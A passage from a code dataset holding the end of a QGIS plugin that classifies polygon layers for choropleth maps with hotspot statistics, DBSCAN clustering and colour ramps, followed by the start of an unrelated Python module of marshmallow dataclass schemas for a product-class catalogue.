inDriver = ogr.GetDriverByName(\"ESRI Shapefile\")\n        inDataSource = inDriver.Open(path, 0)\n        inLayer = inDataSource.GetLayer()\n        global type\n        global thresh\n        type = inLayer.GetLayerDefn().GetGeomType()\n        if type == 3: # is a polygon \n            thresh = pysal.min_threshold_dist_from_shapefile(path)\n            if float(thresh) < 1: #convert decimal degree to meters\n                thresh = round(thresh * 84244.43662,0)\n            else:\n                thresh = round(thresh,0)\n            self.suggest_sweep(str(path).strip(), self.dlg.comboBox.currentText())\n            selectedFieldIndex = self.dlg.comboBox.currentIndex()\n            if 
selectedFieldIndex < 0:\n return\n try:\n self.dlg.comboBox.activated.connect(lambda: self.suggest_sweep(str(path).strip(), str(self.dlg.comboBox.currentText()).strip()))\n #self.dlg.comboBox.currentIndexChanged.connect(lambda: self.suggest_sweep(str(path).strip(), str(self.dlg.comboBox.currentText()).strip()))\n\n except:\n return\n else:\n QMessageBox.warning(self.dlg.show(), self.tr(\"aChor:Warning\"),\n self.tr(\"This is not a polygon shapefile. Please reselect from layer list\"), QMessageBox.Ok) \n \n \n \n \n def loadLayerList(self):\n layers_list = []\n layers_shp = []\n # Show the shapefiles in the ComboBox\n #layers = self.iface.legendInterface().layers()\n layers = [layer for layer in QgsProject.instance().mapLayers().values()]\n \n if len(layers) != 0: # checklayers exist in the project\n for layer in layers:\n if hasattr(layer, \"dataProvider\"): # to not consider Openlayers basemaps in the layer list\n myfilepath = layer.dataProvider().dataSourceUri() # directory including filename\n (myDirectory, nameFile) = os.path.split(myfilepath) # splitting into directory and filename\n if (\".shp\" in nameFile):\n layers_list.append(layer.name())\n layers_shp.append(layer)\n self.dlg.layerListCombo.addItems(layers_list) # adding layers to comboBox\n selectedLayerIndex = self.dlg.layerListCombo.currentIndex()\n if selectedLayerIndex < 0 or selectedLayerIndex > len(layers_shp):\n return\n selectedLayer = layers_shp[selectedLayerIndex]\n #fieldnames = [field.name() for field in selectedLayer.pendingFields()] # fetching fieldnames of layer\n fieldnames = [field.name() for field in selectedLayer.fields()]\n self.clear_fields()\n #fieldtype = [field.type() for field in selectedLayer.pendingFields()]\n fieldtype = [field.type() for field in selectedLayer.fields()]\n if (fieldtype == 'int') or (fieldtype == 'double'):\n self.dlg.comboBox.addItems(fieldnames)\n try:\n self.dlg.layerListCombo.activated.connect(lambda: self.load_comboBox())\n self.dlg.layerListCombo.currentIndexChanged.connect(lambda: self.load_comboBox())\n\n except:\n return False\n return [layers, layers_shp]\n else:\n return [layers, False]\n \n def suggest_sweep(self, inp, attr):\n \n global suggestion\n global achor_max_val\n global achor_min_val\n \n with fiona.open(inp) as source:\n features = list(source)\n \n try:\n i = 0\n for val in features:\n if not(val['properties'][attr] is None):\n #achor_max_val = max(val['properties'][attr] for val in features)\n value = val['properties'][attr] \n if i == 0:\n achor_max_val = value\n achor_min_val = value\n if value > achor_max_val:\n achor_max_val = value\n if value < achor_min_val:\n achor_min_val = value\n i+=1\n\n except KeyError:\n return\n \n if (achor_max_val or achor_min_val):\n valrange = achor_max_val-achor_min_val\n \n if 0 < valrange < 1:\n suggestion = valrange/100\n elif 1 <= valrange < 30:\n suggestion = round(valrange/(valrange*3.33),4)\n elif 30 <= valrange < 100:\n suggestion = round(valrange/(valrange*2),4)\n elif 100 <= valrange < 999:\n suggestion = round(valrange/(valrange*0.37),4)\n elif 1000 < valrange < 4999:\n suggestion = int(valrange/(valrange/2))\n elif 5000 < valrange < 9999:\n suggestion = int(valrange / 1000)\n elif valrange >= 10000:\n suggestion = int(valrange / 2000)\n \n source.close()\n \n if suggestion:\n self.dlg.lineEdit2.setText(str(suggestion))\n \n def create_colorrange(self, i_step, i_start, i_stop, mid=None):\n \n \"\"\"Takes a number of steps to create a color range for given hex color values\"\"\"\n def get_range(step, start, 
stop):\n try:\n initial_start = start\n initial_stop = stop\n \n start = start.lstrip('#')\n stop = stop.lstrip('#')\n \n start_rgb = []\n stop_rgb = []\n \n start_rgb.extend([int(start[i:i+2], 16) for i in (0, 2, 4)])\n stop_rgb.extend([int(stop[i:i+2], 16) for i in (0, 2, 4)])\n \n color_gradient = [initial_start]\n \n step_rgb = []\n operator = []\n\n for start, stop in zip(start_rgb, stop_rgb):\n step_rgb.append(int(abs(start-stop)/(step-1)))\n if start > stop:\n operator.append('-')\n else:\n operator.append('+')\n\n for i in range(int(step)-2):\n for i in range(3):\n if operator[i] == \"+\":\n start_rgb[i] += step_rgb[i]\n elif operator[i] == \"-\":\n start_rgb[i] -= step_rgb[i]\n \n result = '#' + ''.join('0' + str(hex(abs(rgb_val))).lstrip('0x')\n if abs(rgb_val) in ([x for x in range(1,16)])\n else '00' if abs(rgb_val) == 0 \n else str(hex(abs(rgb_val))).lstrip('0x')\n for rgb_val in start_rgb)\n \n color_gradient.append(result) \n color_gradient.append(initial_stop)\n \n return color_gradient\n except ZeroDivisionError:\n print(\"step is {}, has to be minimum 2!\".format(step))\n \n if mid:\n case_even = 0\n if i_step % 2 == 0:\n case_even = 1\n i_step = math.ceil(float(i_step) / 2)\n result = [x for x in get_range(i_step, i_start, mid)]\n result.extend([x for x in get_range(i_step+case_even, mid, i_stop)[1:]])\n \n return result\n return get_range(i_step, i_start, i_stop)\n \n def write_file(self, outfilename, statistics, layerName, inLayer, inDataSource, y, threshold):\n \"\"\"Writing the output shapefile into the mentioned directory\"\"\"\n outDriver = ogr.GetDriverByName(\"ESRI Shapefile\")\n\n layerName = layerName.split('.')\n layerName.pop()\n # layerName = '.'.join(layerName)\n\n outShapefile = outfilename + \".shp\"\n\n # Remove eventually alrady exisiting output\n if os.path.exists(outShapefile):\n outDriver.DeleteDataSource(outShapefile) \n # Create the output shapefile\n outDataSource = outDriver.CreateDataSource(outShapefile)\n outLayer = outDataSource.CreateLayer(\"output\", inLayer.GetSpatialRef(), inLayer.GetLayerDefn().GetGeomType())\n\n # Add input Layer Fields to the output Layer\n inLayerDefn = inLayer.GetLayerDefn()\n \n for i in range(0, inLayerDefn.GetFieldCount()):\n fieldDefn = inLayerDefn.GetFieldDefn(i)\n outLayer.CreateField(fieldDefn)\n\n # Add empty field to store Pysal results\n Z_field = ogr.FieldDefn(\"Z-score\", ogr.OFTReal)\n Z_field.SetWidth(15)\n Z_field.SetPrecision(10)\n outLayer.CreateField(Z_field)\n\n p_field = ogr.FieldDefn(\"p-value\", ogr.OFTReal)\n p_field.SetWidth(15)\n p_field.SetPrecision(10)\n outLayer.CreateField(p_field)\n\n # Create a Field to show hot or coldspot\n Gi_bin = ogr.FieldDefn(\"Gi_Bin\", ogr.OFTString)\n Gi_bin.SetWidth(10)\n Gi_bin.SetPrecision(10)\n outLayer.CreateField(Gi_bin)\n \n # Get the output Layer's Feature Definition\n outLayerDefn = outLayer.GetLayerDefn()\n\n # Get the input Layer's Feature Definition\n inLayerDefn = inLayer.GetLayerDefn()\n\n # Add features to the ouput Layer\n for i in range(0, inLayer.GetFeatureCount()):\n # Get the input Feature\n inFeature = inLayer.GetFeature(i)\n # Create output Feature\n outFeature = ogr.Feature(outLayerDefn)\n # Add field values from input Layer\n for j in range(0, inLayerDefn.GetFieldCount()):\n print(inFeature.GetField(j))\n print(outLayerDefn.GetFieldDefn(j).GetNameRef())\n outFeature.SetField(outLayerDefn.GetFieldDefn(j).GetNameRef(), inFeature.GetField(j))\n # Set geometry\n geom = inFeature.GetGeometryRef()\n outFeature.SetGeometry(geom)\n\n if 
self.dlg.rdb4.isChecked() == 1:\n # Add Z-scores and p-values to their field column\n # to use normality hypothesis\n # first version: max(y)\n if np.mean(y) >= 0:\n outFeature.SetField(\"Z-score\", statistics.Zs[i])\n outFeature.SetField(\"p-value\", statistics.p_norm[i] * 2)\n Z_score = float(statistics.Zs[i])\n p_value = float(statistics.p_norm[i] * 2)\n else:\n outFeature.SetField(\"Z-score\", statistics.Zs[i] * (-1))\n outFeature.SetField(\"p-value\", statistics.p_norm[i] * 2) \n Z_score = float(statistics.Zs[i] * (-1))\n p_value = float(statistics.p_norm[i] * 2)\n # Set Gi_Bin Field\n if Z_score <= -2.58 and p_value <= 0.01:\n outFeature.SetField(\"Gi_Bin\", \"-3\")\n elif Z_score >= 2.58 and p_value <= 0.01:\n outFeature.SetField(\"Gi_Bin\", \"3\")\n elif Z_score <= -1.96 and Z_score > -2.58 and p_value <= 0.05 and p_value > 0.01:\n outFeature.SetField(\"Gi_Bin\", \"-2\")\n elif Z_score >= 1.96 and Z_score < 2.58 and p_value <= 0.05 and p_value > 0.01:\n outFeature.SetField(\"Gi_Bin\", \"2\")\n elif Z_score <= -1.65 and Z_score > -1.96 and p_value <= 0.1 and p_value > 0.05:\n outFeature.SetField(\"Gi_Bin\", \"-1\")\n elif Z_score >= 1.65 and Z_score < 1.96 and p_value <= 0.1 and p_value > 0.05:\n outFeature.SetField(\"Gi_Bin\", \"1\")\n else:\n outFeature.SetField(\"Gi_Bin\", \"0\")\n \n # Add new feature to output Layer\n outLayer.CreateFeature(outFeature)\n\n # Close DataSources\n inDataSource.Destroy()\n outDataSource.Destroy()\n\n\n def getCentroid(self,shp,outpoint):\n #for hotspot and cluster method, when wgs84, reproject into EPSG3857 \n with fiona.open(shp) as src:\n #meta = src.meta\n schema = src.schema\n schema['geometry'] = 'Point'\n schema['properties'].update({'cX': 'float:15.13','cY': 'float:15.13','dbscan': 'int'})\n check = False\n dest_crs = src.crs\n for key in dest_crs.keys(): \n try:\n if dest_crs[key] == 'epsg:4326':\n check = True \n except ValueError:\n pass\n if check == True: \n dest_crs = from_epsg(3857)\n logging.info(\"crs:WGS84, reproject to 3857\")\n \n original = Proj(src.crs) \n destination = Proj('+proj=merc +a=6378137 +b=6378137 +lat_ts=0.0 +lon_0=0.0 +x_0=0.0 +y_0=0 +k=1.0 +units=m +nadgrids=@null +wktext +no_defs')\n #with fiona.open(outpoint, 'w', crs=epsg,**meta) as dst:\n with fiona.open(outpoint,'w',schema=schema,crs=dest_crs,driver=src.driver) as dst:\n for f in src:\n centroid = shape(f['geometry']).centroid \n f['geometry'] = mapping(centroid)\n long = f['geometry']['coordinates'][0]\n lat = f['geometry']['coordinates'][1]\n if check == True: \n x,y = transform(original,destination,long,lat)\n f['geometry']['coordinates'] = (x,y)\n f['properties']['cX'] = round(float(x),13)\n f['properties']['cY'] = round(float(y),13)\n else: \n f['properties']['cX'] = round(float(long),13)\n f['properties']['cY'] = round(float(lat),13)\n f['properties']['dbscan'] = 0 \n dst.write(f)\n dst.close()\n src.close()\n \n \n def make_var_density_blobs(self,n_samples=100, centers=[[0,0]], cluster_std=[0.5], random_state=0):\n samples_per_blob = n_samples // len(centers)\n blobs = [make_blobs(n_samples=samples_per_blob, centers=[c], cluster_std=cluster_std[i])[0]\n for i, c in enumerate(centers)]\n labels = [i * np.ones(samples_per_blob) for i in range(len(centers))]\n return np.vstack(blobs), np.hstack(labels)\n\n def dbf_to_csv(self,dbf_table_pth):#Input a dbf, output a csv, same name, same path, except extension\n csv_fn = dbf_table_pth[:-4]+ \".csv\" #Set the csv file name\n QMessageBox.warning(self.dlg.show(), self.tr(\"aChor:Info\"),\n self.tr(str(csv_fn)), 
QMessageBox.Ok)\n        from dbfread import DBF  # assumption: DBF was never imported; dbfread's DBF matches the field_names/values() API used below\n        table = DBF(dbf_table_pth)# table variable is a DBF object\n        with open(csv_fn, 'w', newline = '') as f:# create a csv file, fill it with dbf content\n            writer = csv.writer(f)\n            writer.writerow(table.field_names)# write the column name\n            for record in table:# write the rows\n                writer.writerow(list(record.values()))\n        return csv_fn# return the csv name\n\n    def run(self):\n        \"\"\"Run method that performs all the real work\"\"\"\n\n        self.dlg.layerListCombo.clear()\n        self.clear_fields()\n        \n        layers, layers_shp = self.loadLayerList()\n        if len(layers) == 0:\n            return \n\n        #set regular expression\n        rx = QRegExp('^[1-9]\\d{1}$')\n        validator = QRegExpValidator(rx)\n        self.dlg.lineEdit.setValidator(validator)\n        rx2 = QRegExp('^0$|^[1-9]\\d*$|^\\.\\d+$|^0\\.\\d*$|^[1-9]\\d*\\.\\d*$')\n        validator2 = QRegExpValidator(rx2)\n        self.dlg.lineEdit2.setValidator(validator2)\n        rx3 = QRegExp('^(0(\\.\\d+)?|1\\.0)\\d{0,3}$')\n        validator3 = QRegExpValidator(rx3)\n        self.dlg.lineps.setValidator(validator3)\n        # show the dialog\n        self.dlg.show()\n        self.load_comboBox()\n        # Run the dialog event loop\n        result = self.dlg.exec_()\n        # See if OK was pressed\n        if result:\n            logging.basicConfig(filename=self.plugin_dir+'/debug.log',filemode='w',level=logging.INFO)\n\n            selectedLayerIndex = self.dlg.layerListCombo.currentIndex()\n            if selectedLayerIndex < 0 or selectedLayerIndex > len(layers):\n                return\n            selectedLayer = layers_shp[selectedLayerIndex]\n            layerName = selectedLayer.dataProvider().dataSourceUri()\n            (path, layer_id) = layerName.split('|')\n            inDriver = ogr.GetDriverByName(\"ESRI Shapefile\")\n            inDataSource = inDriver.Open(path, 0)\n            inLayer = inDataSource.GetLayer()\n            C = selectedLayer.fields().indexFromName(self.dlg.comboBox.currentText())\n            type = inLayer.GetLayerDefn().GetGeomType()\n            \n            if type == 3: # polygon\n                #pass\n                classnum = self.dlg.lineEdit.text()\n                interval = self.dlg.lineEdit2.text()\n                field = self.dlg.comboBox.currentText()\n                calfd = self.dlg.cBox2.currentText()\n                shp = str(path)\n                if self.dlg.rdb1.isChecked():\n                    method = 1\n                    display = 'localextreme'\n                elif self.dlg.rdb2.isChecked():\n                    method = 2\n                    display = 'localmax'\n                elif self.dlg.rdb3.isChecked():\n                    method = 3\n                    display = 'localmin'\n                elif self.dlg.rdb4.isChecked():\n                    method = 4\n                    display = 'hotcoldspot'\n                elif self.dlg.rdb5.isChecked():\n                    method = 5\n                    display = 'neighbor'\n                elif self.dlg.rdb6.isChecked():\n                    method = 6\n                    display = 'cluster'\n                elif self.dlg.cb1.isChecked():\n                    method = 71\n                    display = 'globalextreme-Quantile'\n                elif self.dlg.cb2.isChecked():\n                    method = 72\n                    display = 'globalextreme-Equal'\n                elif self.dlg.cb3.isChecked():\n                    method = 73\n                    display = 'globalextreme-Neighbor'\n                elif self.dlg.rdb8.isChecked():\n                    method = 8\n                    display = 'nested'\n                else:\n                    method = 1\n                    display = 'localextreme'\n                \n                myVectorLayer = QgsVectorLayer(path, display, 'ogr')\n\n                #QMessageBox.warning(self.dlg.show(), self.tr(\"aChor:Warning\"),\n                #self.tr(self.plugin_dir+'\\n'+classnum+'\\n'+interval+'\\n'+field+'\\n'+shp+'\\n'+display), QMessageBox.Ok)\n                logging.info('class number:'+classnum+'\\ninterval:'+str(interval)+'\\nfield:'+field+'\\nshapefile:'+shp+'\\nmethods:'+display)\n\n                #check if sweep interval is reasonable\n                if ((achor_max_val-achor_min_val)/float(interval)) < 15:\n                    interval = suggestion\n                \n                #qgis.utils.iface.actionShowPythonDialog().trigger()\n                strdir=self.plugin_dir\n                if os.name == \"nt\":\n                    py_executable = 'python'\n                    if str(sys.version)[:1] == '3':\n                        py_executable += '3'\n                    
strdir=strdir.replace(\".\",\"\").replace(\"\\\\\",\"/\").replace(\"//\",\"/\")\n elif os.name == \"posix\":\n py_executable = 'python'\n \n if method == 4 or method == 6: \n #convert polygon to point \n outpoint = strdir+\"/test/inputpoint\"\n self.getCentroid(shp,outpoint) \n \n u = []\n inDataSource1 = inDriver.Open(outpoint, 0)\n inLayer1 = inDataSource1.GetLayer()\n\n for i in range(0, inLayer1.GetFeatureCount()):\n geometry = inLayer1.GetFeature(i)\n u.append(geometry.GetField(C)) \n y = np.array(u) # attributes vector\n t = ()\n for feature in inLayer1:\n geometry = feature.GetGeometryRef()\n xy = (geometry.GetX(), geometry.GetY())\n t = t + (xy,) \n if method == 4: \n number = round(float(self.dlg.linefdb.text()),0) \n #thresh = pysal.min_threshold_dist_from_shapefile(path)\n #if float(thresh) < 1: #WGS84\n #threshold = round(thresh,6)\n #w = DistanceBand(t, int(threshold), p=2, binary=False)\n #logging.info(\"Hotspot: Fixed Distance Band: \"+threshold+\", WGS84\")\n #else:\n threshold = number\n w = DistanceBand(t, int(number), p=2, binary=False)\n logging.info(\"Hotspot: Fixed Distance Band: \"+self.dlg.linefdb.text())\n #Run Getis-Ord statistics\n outfilename = strdir+\"/test/hotspotshp\"\n type_w = \"B\"\n permutationsValue = 9999 \n np.random.seed(12345) \n\n statistics = G_Local(y, w, star=True, transform=type_w, permutations=permutationsValue)\n self.write_file(outfilename, statistics, layerName, inLayer1, \n inDataSource1, \n y, threshold) \n #shp=outfilename+\".shp\" \n #inDataSource1.Destroy()\n \n if method == 6:\n # Generate samples\n centers = [[0, -1], [12, 5], [30, 101]]\n densities = [0.2, 0.9, 0.5]\n #convert polygon to point \n items=[\"cx\",\"cy\",field]\n # convert attribute csv\n dbfname=dbf.Table(outpoint+r\"/inputpoint.dbf\",codepage='utf8')\n dbfname.open() \n csvname=strdir+\"/test/inputpoint/inputpoint.csv\" \n \n with open(csvname, 'w', newline = '') as f: \n writer = csv.writer(f)\n writer.writerow(items)\n for record in dbfname:\n #print(record['GebietName'])\n attribute_list = []\n attribute_list.append(record['cx'])\n attribute_list.append(record['cy'])\n attribute_list.append(record[field.lower()])\n try: \n writer.writerow(attribute_list) \n except ValueError: \n pass\n dbfname.close()\n f.close()\n inDataSource1.Destroy()\n # Compute DBSCAN \n data = np.loadtxt(open(csvname, \"rb\"), delimiter=\",\", skiprows=1)\n nrows = data.shape[0]\n \n X, labels_true = self.make_var_density_blobs(n_samples=nrows, centers=centers, cluster_std=densities,\n random_state=0)\n X = StandardScaler().fit_transform(data)\n\n outdbf = dbf.Table(outpoint+r\"/inputpoint.dbf\",codepage='utf8') \n outdbf.open(mode=dbf.READ_WRITE) \n db_t1 = time.time()\n db = DBSCAN(eps=float(self.dlg.lineps.text())).fit(X)\n db_labels = db.labels_\n db_elapsed_time = time.time() - db_t1\n n_clusters_db_ = len(set(db_labels)) - (1 if -1 in db_labels else 0)\n j=0\n for record in outdbf:\n with record as r:\n r.dbscan=db_labels[j]\n j +=1\n if n_clusters_db_ <= 1:\n print('Silhouette Coefficient: NaN (too few clusters)')\n QMessageBox.warning(self.dlg.show(), self.tr(\"aChor:Warning\"),\n self.tr(\"too few clusters: \"+db_labels+\"/n Please change eps to get better result\"), QMessageBox.Ok)\n outdbf.close()\n if not hasattr(sys, 'argv'):\n sys.argv = ['']\n sys.argv.append(classnum)\n sys.argv.append(interval)\n sys.argv.append(field)\n sys.argv.append(shp)\n sys.argv.append(method)\n \n cmd=py_executable+\" \"+strdir+\"/class_achor.py \"+classnum+\" \"+str(interval)+\" \"+field+\" 
\"+shp.strip().replace('\\\\',r'/')\n \n sys.argv.append(calfd)\n cmd+= \" \" + calfd\n \n cmd += \" -m \"+ str(method)\n \n logging.info(\"Starting main script\")\n QMessageBox.warning(self.dlg.show(), self.tr(\"aChor:Info\"),\n self.tr(\"Starting Main Script... Please wait for response\"), QMessageBox.Ok)\n proc = subprocess.Popen(shlex.split(cmd),shell=False,stdin=subprocess.PIPE,stdout=subprocess.PIPE,stderr=subprocess.STDOUT)\n \n while True:\n out = proc.stdout.readline()\n if (str(out).strip() == \"b''\" or str(out).strip() == '') and proc.poll() is not None:\n break\n if not (str(out).strip() == '' or str(out).strip() == \"b''\"):\n print('info:'+str(out).strip())\n \n \n csvfile = strdir+'/achorbreaks.csv'\n \n rcsv = open(csvfile, 'r')\n sortedlist = sorted(rcsv, key= lambda x: float(x))\n \n i = 0\n \n ranges = []\n colorstr = []\n minval = achor_min_val\n while i < int(classnum)-1: \n colorstr.append(str(minval) + '_' + sortedlist[i].strip()) \n minval = round(float(sortedlist[i].strip()),4)\n logging.info('breaks:'+sortedlist[i])\n i += 1\n \n # create colorramps according to the amount of classes/breaks\n white_blue = self.create_colorrange(int(classnum), '#FFFFFF', '#3182bd') #default\n white_purple = self.create_colorrange(int(classnum), '#FFFFFF', '#756bb1')\n white_orange = self.create_colorrange(int(classnum), '#FFFFFF', '#e6550d')\n yellow_cyan_blue = self.create_colorrange(int(classnum), '#edf8b1', '#2c7fb8', '#7fcdbb')\n white_blue_green = self.create_colorrange(int(classnum), '#ece2f0', '#1c9099', '#a6bddb')\n white_pink_purple = self.create_colorrange(int(classnum), '#FFFFFF', 'c51b8a', 'fa9fb5')\n \n crange_selection = self.dlg.cBox.currentIndex() # get the selection from the gui\n \n # provide other options\n if crange_selection == 0:\n crange = white_blue\n elif crange_selection == 1:\n crange = white_purple\n elif crange_selection == 2:\n crange = white_orange \n elif crange_selection == 3:\n crange = yellow_cyan_blue\n elif crange_selection == 4:\n crange = white_blue_green\n elif crange_selection == 5:\n crange = white_pink_purple\n \n color_ranges = []\n for i in range(len(colorstr)-1):\n color_ranges.append((colorstr[i], float(colorstr[i].split('_')[0]), float(colorstr[i].split('_')[1]), crange[i]))\n if i == len(colorstr)-2:\n color_ranges.append((colorstr[i+1], float(colorstr[i+1].split('_')[0]), float(colorstr[i+1].split('_')[1]), crange[i+1]))\n color_ranges.append((colorstr[i+1].split(\"_\")[1] + \"_\" + str(achor_max_val), float(colorstr[i+1].split(\"_\")[1]), float(achor_max_val), crange[i+2]))\n \n # create a category for each item in attribute\n for label, lower, upper, color in color_ranges:\n symbol = QgsSymbol.defaultSymbol(myVectorLayer.geometryType())\n symbol.setColor(QColor(color))\n rng = QgsRendererRange(lower, upper, symbol, label)\n ranges.append(rng)\n \n # create the renderer and assign it to a layer\n expression = field # field name \n renderer = QgsGraduatedSymbolRenderer(expression, ranges)\n myVectorLayer.setRenderer(renderer)\n\n # load the layer with class breaks\n QgsProject.instance().addMapLayer(myVectorLayer)\n myVectorLayer.triggerRepaint()\n rcsv.close()\n # remove temporarily files\n os.remove(csvfile)\n if method == 4:\n filelist = [ f for f in os.listdir(strdir+\"/test/\") if f.startswith(\"hotspotshp\") ]\n for f in filelist:\n os.remove(os.path.join(strdir+\"/test/\", f))\n if method == 4 or method == 6:\n shutil.rmtree(self.plugin_dir+\"/test/inputpoint\")\n shutil.rmtree(self.plugin_dir+\"/tmp\")\n print(\"log: aChor 
Classification Success\")\n QMessageBox.information(self.dlg.show(), self.tr(\"aChor:Result\"),\n self.tr(\"aChor Classification Result Successful Loaded\"), QMessageBox.Ok)\n","repo_name":"Ariel505/aChor","sub_path":"aChor.py","file_name":"aChor.py","file_ext":"py","file_size_in_byte":41296,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"63"} +{"seq_id":"7388175417","text":"import typing\nfrom dataclasses import field\nfrom marshmallow.fields import Str, List, Nested\nfrom marshmallow_dataclass import dataclass\n\nfrom compel_shared import load_yml\nfrom compel_shared.conf import ConfigElement, i18nNamed\nfrom compel_shared.params.param import ParamRecog, ParamBase\nfrom compel_shared.schema import (\n DictField,\n MongoIDSchema,\n OrderedSchema,\n MultilangField,\n Samples)\n\n\n@dataclass(base_schema=OrderedSchema)\nclass NodePath:\n id: str = Str()\n name: str = Str(title='Название')\n\n\n@dataclass(base_schema=OrderedSchema)\nclass ClassAnalytic(ConfigElement):\n product_count: int = field(metadata=dict(\n allow_none=True,\n title=\"Продуктов в классе\",\n description=\"Количество продуктов привязанных к классу\",\n readonly=True\n ))\n\n\n@dataclass(base_schema=OrderedSchema)\nclass Tech(ConfigElement):\n m10: str = field(default=None,\n metadata=dict(\n enum_key='m10_tech',\n title='m10',\n description='Технологический тип для срочного производства модулей',\n allow_none=True,\n inheritable=True,\n ))\n ems: str = field(default=None,\n metadata=dict(\n enum_key='ems_tech',\n title='ems',\n description='Технологический тип для контрактного производства',\n allow_none=True,\n inheritable=True,\n ))\n\n\n@dataclass(base_schema=OrderedSchema)\nclass ClassParamAnalytic:\n product_count: int = field(default=0, metadata=dict(\n title='Продуктов',\n description='Количество продуктов с параметром',\n readonly=True))\n samples: Samples = None\n\n\n@dataclass(base_schema=OrderedSchema)\nclass ImportClassParamAnalytic(ClassParamAnalytic):\n samples: Samples = None\n\n\n@dataclass(base_schema=OrderedSchema)\nclass ClassParam(ParamBase):\n required: bool = field(\n metadata=dict(\n title='Обязательный параметр',\n description='''\n Значение влияет на развесовку и фильтрацию параметров при поиске.\n Обязательные параметры ищутся с особым весом, а также их полный набор \n может быть обязательным при поиске продуктов.\n '''\n ),\n default=False)\n\n displayed: bool = field(\n metadata=dict(\n title='Показывать в API',\n description='Если не отмечено, параметр не будет показываться в каталоге в контексте этого класса'\n ),\n default=True)\n\n # todo возможно, класс ClassParamAnalytic не нужен и стоит просто использовать ParamAnalytic\n # + вынести его в ParamBase\n analytic: ClassParamAnalytic = field(\n default=None,\n metadata=dict(\n title=\"Аналитика данных\",\n unwrap=True,\n readonly=True\n ))\n\n order: int = field(\n default=None,\n metadata=dict(\n allow_none=True,\n title='Порядок отображения',\n description='Порядок отображения параметра при отображении в catalog/api/params',\n unique=True\n )\n )\n\n\n@dataclass(base_schema=OrderedSchema)\nclass ImportClassParam:\n analytic: ImportClassParamAnalytic = field(default=None, metadata=dict(\n title=\"Аналитика данных\",\n unwrap=True,\n readonly=True))\n recog: ParamRecog = field(default=None, metadata=dict(\n title='Конфигурация распознавания', unwrap=True))\n target_id: str = field(default=None, metadata=dict(\n title='Параметр назначения',\n enum_key='target_params',\n as_tree_enum=True,\n 
description='''\n Параметр назначения куда будут складываться значения выделенные из данного параметра.\n \n Код параметра назначения автоматически добавляется ко всем макросам (`$N`, `$S` и т.д.) используемым в шаблонах.\n Если параметр назначения не указан, то коды параметров назначения должны быть прописаны в шаблонах полностью -\n например `$N_temperature_min`.\n '''\n ))\n\n\n@dataclass(base_schema=MongoIDSchema)\nclass Class(i18nNamed):\n id: str = field(\n default=None,\n metadata=dict(\n data_key='_id',\n title='Уникальный ID',\n is_hidden=True)\n )\n\n code: str = field(\n default=None,\n metadata=dict(\n allow_none=True,\n title='Код',\n description='Используется при формировании сигнатуры продуктов',\n unique=True)\n )\n legacy_id: int = field(\n default=None,\n metadata=dict(\n allow_none=True, title='Цифровой идентификатор класса', description='Цифровой идентификатор класса')\n )\n name: typing.Dict[str, str] = field(\n default_factory=dict,\n metadata=dict(\n marshmallow_field=MultilangField(\n title='Название',\n description='Локализоанное название класса в каталоге',\n required_on_create=True, ))\n )\n\n parent_id: str = field(\n default=None, metadata=dict(\n title='Родительский класс',\n allow_none=True,\n as_tree_enum=True,\n enum_key='class_tree_wo_current',\n is_hidden=True, )\n )\n\n axapta_id: str = field(\n default=None, metadata=dict(\n title='Axapta ID',\n description='Код раздела в Axapta',\n example='0403020101',\n is_hidden=True\n )\n )\n axapta_name: str = field(default=None, metadata=dict(\n title='axapta_name',\n description='Имя класса в Axapta',\n example='Конденсаторы керамические',\n is_hidden=True\n ))\n recognized: bool = field(\n default=False,\n metadata=dict(\n default=False,\n title='Распознается',\n description='Если не отмечено, параметры данного класса не будут использоваться при поиске продуктов')\n )\n\n is_leaf: bool = field(\n default=False\n )\n\n providers: typing.List[str] = field(\n default=None,\n metadata=dict(marshmallow_field=List(\n Str(enum_key='providers'),\n title='Приоритет источников',\n description='Список провайдеров, у которых берется класс, в порядке приоритета',\n allow_none=True,\n inheritable=True, ))\n )\n\n analytic: ClassAnalytic = field(\n default=None,\n metadata=dict(\n title=\"Аналитика данных\",\n allow_none=True,\n unwrap=True,\n readonly=True, )\n )\n\n tech: Tech = field(default=None, metadata=dict(\n title='Технологические типы',\n description='Технологические типы для срочного (m10) и контрактного (ems) производства модулей',\n example=dict(m10='CERCAP'),\n allow_none=True,\n unwrap=True,\n inheritable=True,\n ))\n\n params: typing.Dict[str, ClassParam] = field(\n default_factory=dict,\n metadata=dict(\n marshmallow_field=DictField(\n Nested(ClassParam.Schema),\n allow_none=True,\n title='Параметры класса',\n modifiable=True, ))\n )\n\n @staticmethod\n def load_defaults():\n data = load_yml(__file__, 'classes.yml')\n for k in data:\n data[k]['code'] = k\n return data\n\n\n@dataclass(base_schema=OrderedSchema)\nclass ClassImportAnalytic:\n product_count: int = field(metadata=dict(\n allow_none=True,\n title=\"Кол-во продуктов, привязанных к классу\",\n readonly=True,\n ))\n product_count_no_children: int = field(\n default=None,\n metadata=dict(\n allow_none=True,\n title=\"Кол-во продуктов, привязанных к классу без учета вложенности\",\n readonly=True,\n )\n )\n product_samples: typing.List[str] = field(\n default_factory=list, metadata=dict(is_hidden=True))\n\n\n@dataclass\nclass Candidate:\n id: str\n 
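# product count recorded for this candidate class\n 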
product_count: int\n\n\n@dataclass(base_schema=MongoIDSchema)\nclass ClassImport:\n\n id: str = field(\n metadata=dict(\n data_key='_id',\n title='Уникальный ID',\n is_hidden=True)\n )\n\n path: typing.List[NodePath] = field(\n default=None,\n metadata=dict(\n title='Путь в каталоге источника',\n is_hidden=True)\n )\n\n parent_id: str = field(\n default=None,\n metadata=dict(\n title='ID родительского класса',\n allow_none=True,\n is_hidden=True\n )\n )\n code: str = field(\n default=None,\n metadata=dict(\n allow_none=True, title='Код', description='Код класса', unique=True)\n )\n name: str = field(default=None, metadata=dict(\n title='Имя класса источника',\n description='Имя класса источника',\n example='USB Adapters',\n is_hidden=True\n ))\n provider: str = field(default=None, metadata=dict(\n title='Имя источника класса',\n description='Откуда пришел данный класс',\n example='farnell',\n required_on_create=True\n ))\n target_id: str = field(default=None, metadata=dict(\n title='Класс назначения',\n description='Класс к которому привязываются продукты из данного класса источника',\n as_tree_enum=True,\n enum_key='class_tree_with_candidates', )\n )\n\n is_bound: bool = field(\n default=False,\n metadata=dict(\n is_hidden=True)\n )\n\n candidates: typing.List[Candidate] = field(\n default_factory=list,\n metadata=dict(\n is_hidden=True)\n )\n\n params: typing.Dict[str, ImportClassParam] = field(\n default_factory=dict,\n metadata=dict(marshmallow_field=DictField(\n Nested(ImportClassParam.Schema),\n allow_none=True,\n title='Параметры класса',\n 